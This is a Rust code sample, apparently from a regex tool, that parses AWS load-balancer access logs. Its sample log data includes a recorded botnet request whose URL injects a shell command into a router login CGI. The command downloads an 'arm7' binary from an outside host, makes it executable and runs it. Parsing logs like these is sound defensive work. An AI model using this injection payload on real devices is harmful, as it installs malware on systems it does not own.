// include the latest version of the regex crate in your Cargo.toml
extern crate regex;
use regex::Regex;
fn main() {
let regex = Regex::new(r#"(?m)^(?P<alb_type>(https?|h2|wss?))\s*(?P<alb_timestamp>[^\s]+)\s*(?P<alb_elb>[^\s]+)\s*(?P<alb_client_addr>[^:]+):\s*(?P<alb_client_port>[^\s]+)\s*(?P<alb_target_addr>-)\s*(?P<alb_request_processing_time>[^\s]+)\s*(?P<alb_target_processing_time>[^\s]+)\s*(?P<alb_response_processing_time>[^\s]+)\s*(?P<alb_elb_status_code>[^\s]+)\s*(?P<alb_target_status_code>[^\s]+)\s*(?P<alb_received_bytes>[^\s]+)\s*(?P<alb_sent_bytes>[^\s]+)\s*"(?P<alb_request>.*?)"\s+"(?P<alb_user_agent>[^\"]+)"\s*(?P<alb_ssl_cipher>[^\s]+)\s*(?P<alb_ssl_protocol>[^\s]+)\s*(?P<alb_target_group_arn>[^\s]+)\s*"(?P<alb_trace_id>[^\"]+)"\s*"(?P<alb_domain_name>[a-zA-Z0-9\.\-:]+)"\s*"(?P<alb_chosen_cert_arn>[^\"]+)"\s*(?P<alb_matched_rule_priority>[^\s]+)\s*(?P<alb_request_creation_time>[^\s]+)\s*\s*"(?P<alb_actions_executed>[^\s]+)"\s*"(?P<alb_redirect_url>[^\s]+)"\s*"(?P<alb_error_reason>[^\"]+)"\s*"?(?P<alb_target_port_list>[0-9 :\.-]+)"?\s*"?(?P<alb_target_status_code_list>[0-9 -]+)"?"#).unwrap();
let string = "https 2020-04-16T22:12:33.005975Z app/4da01abcd-prod-mer-c3e3/5b28cd8a0000e9ade 12.20.0.124:40802 - -1 -1 -1 400 - 163 288 \"POST http://4da14ddd-prod-mergedextern-c3e3-212123456.us-east-1.elb.amazonaws.com:80/form/admin/formPin HTTP/1.1\" \"polaris botnet\" - - - \"-\" \"-\" \"-\" - 2020-04-16T22:12:33.005000Z \"-\" \"-\" \"-\" \"-\" \"-\"
http 2020-04-16T22:58:45.017441Z app/4da14ddd-prod-mer-c3e3/7f28ba8e991e9ade 89.12.16.13:52263 - -1 -1 -1 400 - 266 288 \"POST http://3ca14abc-prod-mer-c3e3-2129123456.us-east-1.elb.amazonaws.com:80/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh$\"cd${IF}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IF}busybox${IFS}cget${IFS}http://19ce0f.grok.im/arm7;${IFS}chmod${IFS}77${IFS}arm7;${IFS}./arm7\"%0A%2&logUser=a&loginPwd=a HTTP/1.1\" \"-\" - - - \"-\" \"-\" \"-\" - 2020-04-16T22:58:45.017000Z \"-\" \"-\" \"-\" \"-\" \"-\"
https 2020-04-17T00:03:31.610273Z app/4da10abc-prod-mer-c3e3/7f28ba8e881e0ade 74.7.15.100:33766 - -1 -1 -1 400 - 0 0 \"- https://4da14eee-prod-mer-c3e3-2129577269.us-east-1.elb.amazonaws.com:443- -\" \"-\" ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 - \"-\" \"-\" \"arn:aws:acm:us-east-1:57257000000:certificate/ae07b666-1ee3-4b79-bde5-022ddee00a21\" - 2020-04-17T00:03:31.610000Z \"-\" \"-\" \"-\" \"-\" \"-\"
https 2020-04-17T00:03:30.285233Z app/4da1eeee-prod-mer-c0a0/7f28ba8e000e9adf 604.2.14.6:33547 - -1 -1 -1 400 - 0 0 \"- https://4da14ddd-prod-mergedextern-c3e3-2129123456.us-east-1.elb.amazonaws.com:443- -\" \"-\" ECDHE-RSA-AES128-SHA TLSv1 - \"-\" \"-\" \"arn:aws:acm:us-east-1:572571234567:certificate/ae07b36f-1463-4b79-bdc5-922ddee87a31\" - 2020-04-17T00:03:30.285000Z \"-\" \"-\" \"-\" \"-\" \"-\"
https 2020-04-17T00:05:41.560192Z app/4da00eee-prod-mer-c3e3/7f28ba8e991e9ade 209.17.96.66:54201 - -1 -1 -1 404 - 139 167 \"GET https://34.202.223.200:443/ HTTP/1.1\" \"Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)\" ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 - \"Root=1-5e98d123c-ea7e5a803e7abcab79cb0772\" \"3.102.123.345:443\" \"arn:aws:acm:us-east-1:572512345678:certificate/ae07a00c-1426-4b00-bdc5-123abce87a31\" 0 2020-04-17T00:05:41.560000Z \"fixed-response\" \"-\" \"-\" \"-\" \"-\"
";
// result will be an iterator over tuples containing the start and end indices for each match in the string
let result = regex.captures_iter(string);
for mat in result {
println!("{:?}", mat);
}
}
Please keep in mind that these code samples are automatically generated and are not guaranteed to work. If you find any syntax errors, feel free to submit a bug report. For a full regex reference for Rust, please visit: https://docs.rs/regex/latest/regex/